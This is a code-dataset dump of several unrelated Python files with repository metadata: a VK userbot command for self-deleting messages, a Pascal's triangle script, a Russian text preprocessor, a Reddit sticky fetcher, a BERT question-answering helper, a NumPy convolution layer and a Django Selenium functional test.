hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7743ca240ee591871b50f39538bcec9c1cbea542 | 2,076 | py | Python | idm/my_signals/bomb.py | Deril456/IrCA-Duty | 7aa934f446007f8816487e59d3cb5cf31696f3b9 | [
"MIT"
] | 1 | 2020-07-28T17:18:56.000Z | 2020-07-28T17:18:56.000Z | idm/my_signals/bomb.py | Deril456/IrCA-Duty | 7aa934f446007f8816487e59d3cb5cf31696f3b9 | [
"MIT"
] | null | null | null | idm/my_signals/bomb.py | Deril456/IrCA-Duty | 7aa934f446007f8816487e59d3cb5cf31696f3b9 | [
"MIT"
] | 1 | 2021-01-30T11:41:02.000Z | 2021-01-30T11:41:02.000Z | from idm.objects import DB, dp, MySignalEvent
from html import escape
import re
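# The handlers below register the chat command "б" (presumably short for "бомба", i.e. "bomb"):
# a message sent with expire_ttl so that it self-destructs after the requested time.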
@dp.longpoll_event_register('б')
@dp.my_signal_event_register('б')
def bomb(event: MySignalEvent):
event.msg_op(3)
reply = ''
sticker = ''
data = False
att = []
text = ' '
hours = re.findall(r'\d+ ?ч\w*', event.msg['text'])  # "ч..." = hours (часы)
secs = re.findall(r'\d+ ?с\w*', event.msg['text'])  # "с..." = seconds (секунды)
mins = re.findall(r'\d+ ?м\w*', event.msg['text'])  # "м..." = minutes (минуты)
time = 0
for i in hours:
time += int(re.search(r'\d+', i)[0])*3600
for i in mins:
time += int(re.search(r'\d+', i)[0])*60
for i in secs:
time += int(re.search(r'\d+', i)[0])
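# e.g. the text "2ч 30м" ("2h 30m") is parsed as 2*3600 + 30*60 = 9000 seconds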
if time == 0:
time = 60
elif time > 86400:
event.msg_op(2, '❗ Осади, максимальная длина - сутки')  # "Slow down, the maximum length is one day"
return "ok"
if event.payload:
text = event.payload
data = True
if event.attachments:
att.extend(event.attachments)
data = True
if event.reply_message:
reply = event.reply_message['id']
if event.reply_message['from_id'] == event.db.duty_id:
atts = event.reply_message['attachments']
if atts:
atts = atts[0]
if atts['type'] == 'sticker':
sticker = atts['sticker']
sticker = int(sticker['sticker_id'])
data = False
event.api.msg_op(3, msg_id=event.reply_message['id'])
reply = ''
if not data:
if event.reply_message:
text = event.reply_message['text']
reply = ''
else:
event.msg_op(2, '❗ Ну и че мне отправить?')  # "So what am I supposed to send?"
return "ok"
text = text.replace("\n", "<br>")
event.api.exe('return API.messages.send({'+
f'peer_id:{event.chat.peer_id},'+
f'message:"{escape(text)}",'+
f'expire_ttl:{time},'+
f'attachment:"{",".join(att)}",'+
f'sticker_id:"{sticker}",'+
f'reply_to:"{reply}",'+
'random_id:0'+
'});', event.db.me_token)
return "ok" | 28.833333 | 73 | 0.517341 | 273 | 2,076 | 3.842491 | 0.333333 | 0.06673 | 0.113441 | 0.031459 | 0.077216 | 0.054337 | 0.054337 | 0.054337 | 0 | 0 | 0 | 0.01689 | 0.315511 | 2,076 | 72 | 74 | 28.833333 | 0.719916 | 0 | 0 | 0.190476 | 0 | 0 | 0.172845 | 0.051035 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015873 | false | 0 | 0.047619 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
77457378c18a58bbbf6747011ba846504be5405e | 231 | py | Python | JiaLu/learn/list_training1.py | 13022108937/homework | 05b3c0535532766b286976b15245ed1f925da8c5 | [
"Apache-2.0"
] | null | null | null | JiaLu/learn/list_training1.py | 13022108937/homework | 05b3c0535532766b286976b15245ed1f925da8c5 | [
"Apache-2.0"
] | null | null | null | JiaLu/learn/list_training1.py | 13022108937/homework | 05b3c0535532766b286976b15245ed1f925da8c5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
def test(n):  # print the first n rows of Pascal's triangle
    N = [1]
    count = 0
    while count < n:
        print(N)
        N.append(0)
        # next row: pairwise sums; N[i-1] wraps around to the trailing 0 when i == 0
        N = [N[i-1] + N[i] for i in range(len(N))]
        count += 1
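# For example, test(4) prints the first four rows of Pascal's triangle:
# [1]
# [1, 1]
# [1, 2, 1]
# [1, 3, 3, 1]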
count = int(input(">>> "))
test(count)
| 15.4 | 50 | 0.454545 | 38 | 231 | 2.763158 | 0.526316 | 0.057143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033113 | 0.34632 | 231 | 14 | 51 | 16.5 | 0.662252 | 0.08658 | 0 | 0 | 0 | 0 | 0.019048 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.1 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
77472a5b88bd15c04f5e4d83d5cfd706840488ad | 6,116 | py | Python | src/utils/Preprocessing_text.py | SkylarPro/YandexCupCV | 103bb1abe4daacd72b5a72476e66cf33454807e8 | [
"MIT"
] | 1 | 2021-11-24T20:37:44.000Z | 2021-11-24T20:37:44.000Z | src/utils/Preprocessing_text.py | SkylarPro/YandexCupCV | 103bb1abe4daacd72b5a72476e66cf33454807e8 | [
"MIT"
] | null | null | null | src/utils/Preprocessing_text.py | SkylarPro/YandexCupCV | 103bb1abe4daacd72b5a72476e66cf33454807e8 | [
"MIT"
] | null | null | null | from itertools import chain
import pandas as pd
#!/usr/bin/env python
# coding: utf-8
import pymorphy2
import multiprocessing as mp
from nltk.tokenize import TweetTokenizer
from typing import Dict, List,Tuple
import re
import string
import os  # needed for os.remove() in save_in_csv()
config_prep_text = {
"path_to_csv":"Output.csv",
"path_from_csv":"Input.csv",
"remove_input_data":False,
"lower_text":True,
"only_ru_simb":True,
"clean_space": True,
"clean_link": True,
"clean_hashtag": True,
"clean_punct": True,
"word_to_lemma": True,
"min_len_sent" :1,
"stopwrd": [],
}
class PreprocText:
def __init__(self,config:Dict[str, bool], tokenizer=None,):
if tokenizer:
self.tokenizer = tokenizer
else:
self.tokenizer = TweetTokenizer(preserve_case=False,strip_handles=True,
reduce_len=True,
)
self.config = config
m = mp.Manager()
self._result_queue = m.Queue()
self.procc_text = []
self.balance_class = []
self._morph = pymorphy2.MorphAnalyzer(lang='ru')
self.empty_class = []
self._stpword = config.get("stopwrd", [])  # stop-word list referenced in _processing_text()
def _processing_text(self,proc_text):
idx = proc_text[0]
proc_text = proc_text[1]
print(proc_text)
proc_text = proc_text.lower() if self.config.get("lower_text") == True else proc_text
proc_text = re.sub('[^а-я]', " ",proc_text) if self.config.get("only_ru_simb") == True else proc_text
proc_text = proc_text.replace(" ", " ") if self.config.get("clean_space") == True else proc_text
proc_text = re.sub(r"http\S+", "",proc_text) if self.config.get("clean_link") == True else proc_text
proc_text = re.sub(r'#','',proc_text) if self.config.get("clean_hashtag") == True else proc_text
proc_text = [char for char in proc_text if char not in string.punctuation] if self.config.get("clean_punct") == True else proc_text
proc_text = ''.join(proc_text)
proc_text = ' '.join([word for word in proc_text.split() if word.lower() not in self._stpword]) if len(self.config.get("stopwrd")) != 0 else proc_text
if self.config.get("word_to_lemma") == True:
proc_text = self.tokenizer.tokenize(proc_text)
sent_lemm = []
for word in proc_text:
word_normal = self._morph.parse(word)[0]
# keep the lemma only when the analyzer is confident about the normal form
if word_normal.score > 0.70:
sent_lemm.append(word_normal.normal_form)
else:
sent_lemm.append(word)
proc_text = ' '.join(sent_lemm)
return idx, proc_text
def _worker(self, task):
result = self._processing_text(task)
self._result_queue.put(result)
def _balans_start_index(self,class_count):
"""
Some sentences become empty after preprocessing; such sentences are removed here,
and the per-class element counts are updated accordingly.
"""
data_proc = []
step = [-1, 0]
min_len_sent = self.config.get("min_len_sent")
for idx, (_,text) in enumerate(self.procc_text):
if step[1] == idx:
step[0] += 1
step[1] += class_count[step[0]]
if len(text.split()) <= min_len_sent:
# minimum number of words required to keep a sentence
class_count[step[0]] -= 1
else:
data_proc.append(text)
if class_count[step[0]] == 0:
self.empty_class.append(step[0])
assert len(data_proc) == sum(class_count)
return data_proc, class_count
@property
def get_data(self,):
return self.procc_text, self.balance_class
def save_in_csv(self,id_img,remove_input_file = False):
idxs = list(chain.from_iterable([[label] * count for label, count in zip(id_img, self.balance_class)]))
data = {}
for idx, text in zip(idxs, self.procc_text):
if idx not in data:
data[idx] = []
data[idx].append(text)
data = {key:"SEP".join(data[key]) for key,val in data.items()}
pd.DataFrame({"id_imgs":data.keys(),
"text": data.values()
}).to_csv(self.config["path_to_csv"],index = False)
if self.config["remove_input_data"]:
os.remove(self.config["path_from_csv"])
return True
def processing_from_csv(self,):
df = pd.read_csv(self.config["path_from_csv"])
texts = [text.split("SEP") for text in df["text"]]
class_count = [len(sample) for sample in texts]
data = list(zip(range(sum(class_count)),chain.from_iterable(texts)))
id_imgs = df["id_imgs"].values
assert len(data) == sum(class_count),print(len(data), sum(class_count))
self.processing_big_data(data,class_count = class_count,id_img = id_imgs)
def processing_big_data(self,data, class_count = None, id_img = None, n_worker = 1):
with mp.Pool(n_worker) as p:
p.map(self._worker, data)
for _ in range(len(data)):
self.procc_text.append(self._result_queue.get())
assert len(self.procc_text) == len(data), f"{len(self.procc_text)} != {len(data)}"
print("Started sorting")
self.procc_text = sorted(self.procc_text)
if class_count:
self.procc_text, self.balance_class = self._balans_start_index(class_count)
else:
self.procc_text, self.balance_class = self.procc_text, None
if self.config["path_to_csv"].find(".csv")!=-1:
self.save_in_csv(id_img)
return self.procc_text, self.balance_class | 36.622754 | 160 | 0.565402 | 778 | 6,116 | 4.209512 | 0.231362 | 0.080611 | 0.051603 | 0.05374 | 0.22229 | 0.155725 | 0.095878 | 0.027176 | 0.018321 | 0 | 0 | 0.006494 | 0.320144 | 6,116 | 167 | 161 | 36.622754 | 0.781145 | 0.04431 | 0 | 0.05042 | 0 | 0 | 0.074055 | 0.003798 | 0 | 0 | 0 | 0 | 0.02521 | 1 | 0.067227 | false | 0 | 0.067227 | 0.008403 | 0.184874 | 0.02521 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
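# Usage sketch (not part of the original file; assumes an "Input.csv" with "id_imgs" and "text"
# columns, where the texts belonging to one image are joined by the literal string "SEP"):
# prep = PreprocText(config_prep_text)
# prep.processing_from_csv()           # reads Input.csv, cleans the texts, writes Output.csv
# texts, class_counts = prep.get_data  # get_data is a property, so no parentheses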
7747475d656042566415626e3982f5c6ffcfd3c2 | 699 | py | Python | kog/reddit/lists.py | GPelayo/kwantiko | b859419a3eb21a0015f69076c0a333d0cc8992d8 | [
"MIT"
] | null | null | null | kog/reddit/lists.py | GPelayo/kwantiko | b859419a3eb21a0015f69076c0a333d0cc8992d8 | [
"MIT"
] | null | null | null | kog/reddit/lists.py | GPelayo/kwantiko | b859419a3eb21a0015f69076c0a333d0cc8992d8 | [
"MIT"
] | null | null | null | from praw.models import Submission
from typing import Generator, Optional
from kog.reddit import create_reddit_object
MAX_STICKIES = 2
class SubredditStickies:
    def __init__(self, subreddit_name: str, filter_substring: Optional[str] = ''):
        self.reddit = create_reddit_object()
        self.subreddit_name = subreddit_name
        self.filter_substring = filter_substring

    @property
    def sticky_ids(self) -> Generator[Submission, None, None]:
        for i in range(1, MAX_STICKIES + 1):
            # praw's sticky() returns the Submission object itself
            sticky_id = self.reddit.subreddit(self.subreddit_name).sticky(i)
            if self.filter_substring in self.reddit.submission(id=sticky_id).title:
                yield sticky_id
| 34.95 | 83 | 0.712446 | 89 | 699 | 5.348315 | 0.426966 | 0.109244 | 0.107143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005405 | 0.206009 | 699 | 19 | 84 | 36.789474 | 0.852252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
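# Usage sketch (hypothetical subreddit name; create_reddit_object() must return an authenticated
# praw.Reddit instance, and the subreddit needs at least MAX_STICKIES stickied posts):
# stickies = SubredditStickies("learnpython", filter_substring="Weekly")
# for sticky in stickies.sticky_ids:
#     print(sticky.title)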
7748f676dcb533403a7279380d65acf0c31a7157 | 2,497 | py | Python | model.py | iliasi/BERT-model-Q-A | 84a4d2cc0a73da365b4d26e4ff8d09b47c89663f | [
"MIT"
] | null | null | null | model.py | iliasi/BERT-model-Q-A | 84a4d2cc0a73da365b4d26e4ff8d09b47c89663f | [
"MIT"
] | null | null | null | model.py | iliasi/BERT-model-Q-A | 84a4d2cc0a73da365b4d26e4ff8d09b47c89663f | [
"MIT"
] | null | null | null | from transformers import AutoTokenizer, AutoModelForQuestionAnswering
import torch
import textwrap
import streamlit as st
def answer_question(question, article_text):
'''
Takes a `question` string and an `article or essay` string,
it then identifies the words within the `article or essay` that are the
answer(s) to the question.
'''
tokenizer = AutoTokenizer.from_pretrained("bert-large-uncased-whole-word-masking-finetuned-squad")
model = AutoModelForQuestionAnswering.from_pretrained("bert-large-uncased-whole-word-masking-finetuned-squad")
# ======== Tokenize ========
# Apply the tokenizer to the input text, treating them as a text-pair.
input_ids = tokenizer.encode(question, article_text)
# ======== Set Segment IDs ========
# Search the input_ids for the first instance of the `[SEP]` token.
sep_index = input_ids.index(tokenizer.sep_token_id)
# The number of segment A tokens includes the [SEP] token istelf.
num_seg_a = sep_index + 1
# The remainder are segment B.
num_seg_b = len(input_ids) - num_seg_a
# Construct the list of 0s and 1s.
segment_ids = [0]*num_seg_a + [1]*num_seg_b
# There should be a segment_id for every input token.
assert len(segment_ids) == len(input_ids)
# ======== Evaluate ========
# Run our example through the model.
outputs = model(torch.tensor([input_ids]), # The tokens representing our input text.
token_type_ids=torch.tensor([segment_ids]), # The segment IDs to differentiate question from answer_text
return_dict=True)
start_scores = outputs.start_logits
end_scores = outputs.end_logits
# ======== Reconstruct Answer ========
# Find the tokens with the highest `start` and `end` scores.
answer_start = torch.argmax(start_scores)
answer_end = torch.argmax(end_scores)
# Get the string versions of the input tokens.
tokens = tokenizer.convert_ids_to_tokens(input_ids)
# Start with the first token.
answer = tokens[answer_start]
# Select the remaining answer tokens and join them with whitespace.
for i in range(answer_start + 1, answer_end + 1):
# If it's a subword token, then recombine it with the previous token.
if tokens[i][0:2] == '##':
answer += tokens[i][2:]
# Otherwise, add a space then the token.
else:
answer += ' ' + tokens[i]
return 'Answer: "' + answer + '"'
| 36.188406 | 124 | 0.664397 | 334 | 2,497 | 4.823353 | 0.368263 | 0.034761 | 0.013035 | 0.028554 | 0.074488 | 0.074488 | 0.074488 | 0.074488 | 0.074488 | 0.074488 | 0 | 0.005192 | 0.228674 | 2,497 | 68 | 125 | 36.720588 | 0.831256 | 0.415298 | 0 | 0 | 0 | 0 | 0.08398 | 0.074806 | 0 | 0 | 0 | 0 | 0.035714 | 1 | 0.035714 | false | 0 | 0.142857 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
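# Usage sketch (illustrative question and article text; the first call downloads the
# bert-large-uncased-whole-word-masking-finetuned-squad weights, which are large):
# article = "The Eiffel Tower is a wrought-iron lattice tower in Paris. It was completed in 1889."
# print(answer_question("When was the Eiffel Tower completed?", article))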
774e02245b93db2b7e7c763898a30ac5929d71c3 | 5,945 | py | Python | CNN.py | LuranWang/machine_learning | d0de8a0a143bd4a436c1be3274828469d544178f | [
"Apache-2.0"
] | null | null | null | CNN.py | LuranWang/machine_learning | d0de8a0a143bd4a436c1be3274828469d544178f | [
"Apache-2.0"
] | null | null | null | CNN.py | LuranWang/machine_learning | d0de8a0a143bd4a436c1be3274828469d544178f | [
"Apache-2.0"
] | null | null | null | import numpy as np
class CNN_layer():
def __init__(self,strided_number=1,size_number=3,core_number=1):
self.input_number = None
self.input_layer=None
self.output_number = core_number
self.cores=None
self.size_number=size_number
self.strided = strided_number
self.output =None
self.cores_re=None
self.b=np.random.random()
self.db=None
self.x=None
self.dx=None
self.dtheta=None
self.velocity_b = 0
self.velocity_theta = 0
self.first_momentum_theta = 0
self.second_momentum_theta = 0
self.first_momentum_b = 0
self.second_momentum_b = 0
self.n=0
def fit(self,input):  # input is a 4-D array: (n_samples, n_channels, height, width)
if self.n ==0:
self.cores = np.random.random((self.output_number, input.shape[1], self.size_number, self.size_number))-0.5
self.cores_re=np.zeros((self.output_number, input.shape[1], self.size_number, self.size_number))
else:
self.cores=self.cores
self.cores_re=np.zeros((self.output_number, input.shape[1], self.size_number, self.size_number))
self.x=input
self.input_number = input.shape[0]
self.input_layer=input.shape[1]
ilength=input.shape[3]
iwidth=input.shape[2]
clength=self.size_number
output = np.ones((input.shape[0],self.output_number, int((iwidth - clength) / self.strided + 1),
int((ilength - clength) / self.strided + 1)))
for lc in range(output.shape[0]):  # for each sample
for ic in range(output.shape[1]):  # for each layer (output channel)
for jc in range(output.shape[2]):  # for each column
for kc in range(output.shape[3]):  # for each row
cnn_result = np.sum(np.multiply(input[lc,:,
jc*self.strided:jc*self.strided+clength,kc*self.strided:kc*self.strided+clength],self.cores[ic,:,:,:]))
output[lc,ic,jc,kc]=cnn_result
self.output=output+self.b
self.n+=1
return self.output
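# Shape example (illustrative): an input of shape (8, 3, 32, 32) with core_number=16,
# size_number=3 and strided_number=1 yields an output of shape (8, 16, 30, 30),
# since (32 - 3) / 1 + 1 = 30.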
def fit_dx(self, input, cores):  # input is a 5-D tensor used for dx: (batch, n_output_channels, n_input_channels, width, length)
clength = self.size_number
output = np.ones((self.x.shape))
for lc in range(output.shape[0]):  # for each sample
for ic in range(output.shape[1]):  # for each layer (channel)
for jc in range(output.shape[2]):  # for each column
for kc in range(output.shape[3]):  # for each row
cnn_result = np.sum(np.multiply(input[lc, :, :,
jc * self.strided:jc * self.strided + clength,
kc * self.strided:kc * self.strided + clength],
cores[:, :, :, :])) / self.x.shape[0]
output[lc, ic, jc, kc] = cnn_result
output = output + self.b
return output
def fit_dtheta(self, input, cores):
clength = cores.shape[-1]
output = np.ones((self.cores.shape))
sum=0
for lc in range(output.shape[0]):  # for each kernel
for ic in range(output.shape[1]):  # for each layer (channel)
for jc in range(output.shape[2]):  # for each column
for kc in range(output.shape[3]):  # for each row
for b in range(input.shape[0]):  # for each sample
sum += np.sum(np.multiply(input[b, ic,
jc * self.strided:jc * self.strided + clength,
kc * self.strided:kc * self.strided + clength],
cores[b, lc, :, :])) / input.shape[0]
output[lc, ic, jc, kc] = sum
sum=0
return output
def g_cnn(self,input):
output_rearrange=np.zeros((self.output.shape[0],self.output.shape[1],self.input_layer,self.output.shape[2]+self.x.shape[-1]-1,self.output.shape[3]+self.x.shape[-1]-1))
for ic1 in range(input.shape[0]):
for kc1 in range(input.shape[1]):
for lc1 in range(output_rearrange.shape[2]):
output_rearrange[ic1,kc1,lc1,self.size_number-1:self.size_number-1+self.output.shape[3],
self.size_number-1:self.size_number-1+self.output.shape[3]]=input[ic1,kc1,:,:]  # the input here has the same size as the previous function's output
for ic1 in range(self.cores.shape[0]):
for kc1 in range(self.cores.shape[1]):
self.cores_re[ic1,kc1,:,:]=np.flipud(np.fliplr(self.cores[ic1,kc1,:,:]))
self.dx=self.fit_dx(output_rearrange,self.cores_re)
cores_re1=np.zeros((input.shape))
#for ic2 in range(input.shape[0]):
#for kc2 in range(input.shape[1]):
#cores_re1[ic2,kc2,:,:]=input[ic2,kc2,:,:]
self.dtheta=self.fit_dtheta(self.x,input)
self.db=np.sum(input)
return self.dx
def momentum(self,rho=0.9, alpha=0.0005):
self.velocity_b=rho*self.velocity_b+(1-rho)*self.db
self.b-=alpha*self.velocity_b
self.velocity_theta = rho * self.velocity_theta + (1-rho)*self.dtheta
self.cores -= alpha * self.velocity_theta
def Adam(self,beta1,beta2,alpha):
self.first_momentum_b = beta1 * self.first_momentum_b + (1 - beta1) * self.db
self.second_momentum_b = beta2 * self.first_momentum_b + (1 - beta2) * self.db
self.b+= alpha*self.first_momentum_b / (np.sqrt(self.second_momentum_b) + 1e-7)
self.first_momentum_theta = beta1 * self.first_momentum_theta + (1 - beta1) * self.dtheta
self.second_momentum_theta = beta2 * self.first_momentum_theta + (1 - beta2) * self.dtheta
self.dtheta = self.first_momentum_theta / (np.sqrt(self.second_momentum_theta) + 1e-7) | 54.045455 | 176 | 0.550378 | 784 | 5,945 | 4.053571 | 0.114796 | 0.044053 | 0.057269 | 0.067967 | 0.474827 | 0.370673 | 0.329138 | 0.278162 | 0.278162 | 0.278162 | 0 | 0.027854 | 0.323633 | 5,945 | 110 | 177 | 54.045455 | 0.762497 | 0.044071 | 0 | 0.247619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.009524 | 0 | 0.12381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
774e354573df9ecbd90ef267a28d523c42f1494e | 4,545 | py | Python | functional_tests/test.py | pavle-batuta/djangoTDD | e618ef17f5fc06a5393ebc1986ef209905e21403 | [
"MIT"
] | null | null | null | functional_tests/test.py | pavle-batuta/djangoTDD | e618ef17f5fc06a5393ebc1986ef209905e21403 | [
"MIT"
] | null | null | null | functional_tests/test.py | pavle-batuta/djangoTDD | e618ef17f5fc06a5393ebc1986ef209905e21403 | [
"MIT"
] | null | null | null | from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import unittest
import time
class NewVisitorTest(StaticLiveServerTestCase):
"""Test case for a new visitor"""
def setUp(self):
self.browser = webdriver.Firefox()
self.browser.implicitly_wait(3)
def tearDown(self):
self.browser.quit()
def check_for_row_in_list_table(self, row_text):
table = self.browser.find_element_by_id('id_list_table')
rows = table.find_elements_by_tag_name('tr')
self.assertIn(row_text, [row.text for row in rows])
def test_can_start_a_list_and_retrieve_it_later(self):
user_1_test_strings = [
'Buy peacock feathers',
'Use peacock feathers to make a fly',
]
user_2_test_strings = [
'Buy milk',
]
user1_correct_strings = [
'1: Buy peacock feathers',
'2: Use peacock feathers to make a fly',
]
user2_correct_strings = [
'1: Buy milk',
]
# Check out the homepage
self.browser.get(self.live_server_url)
# Page title and header should mention to-do lists
self.assertIn('To-Do', self.browser.title)
header_text = self.browser.find_element_by_tag_name('h1').text
self.assertIn('To-Do', header_text)
# The user is invited to enter a to-do item immediately
inputbox = self.browser.find_element_by_id('id_new_item')
self.assertEqual(
inputbox.get_attribute('placeholder'),
'Enter a to-do item'
)
# The user types in 'Buy peacock feathers' for some reason that I cannot fathom
inputbox.send_keys(user_1_test_strings[0])
# The user hits enter.
inputbox.send_keys(Keys.ENTER)
# Check if the list URL is valid!
user1_url = self.browser.current_url
self.assertRegex(user1_url, '/lists/.+')
# The page updates
# Page now lists "1: Buy peacock feathers" as an item in a to-do list
self.check_for_row_in_list_table(user1_correct_strings[0])
# There is still a text box for entering another item.
# The user enters: 'Use peacock feathers to make a fly'
inputbox = self.browser.find_element_by_id('id_new_item')
inputbox.send_keys(user_1_test_strings[1])
# The user hits enter
inputbox.send_keys(Keys.ENTER)
# The page updates again.
# Both items are present on the list.
self.check_for_row_in_list_table(user1_correct_strings[1])
# The site has generated a unique URL for the user.
# The user goes to the great userspace in the sky.
## Make sure no information from the previous user is corrupting the
# new user's experience (cookies etc) ##
self.browser.quit()
self.browser = webdriver.Firefox()
# A new user is spawned!
# User visits the homepage
# Check if there is not garbage left behind by the previous user.
self.browser.get(self.live_server_url)
page_text = self.browser.find_element_by_tag_name('body').text
self.assertNotIn(user_1_test_strings[0], page_text)
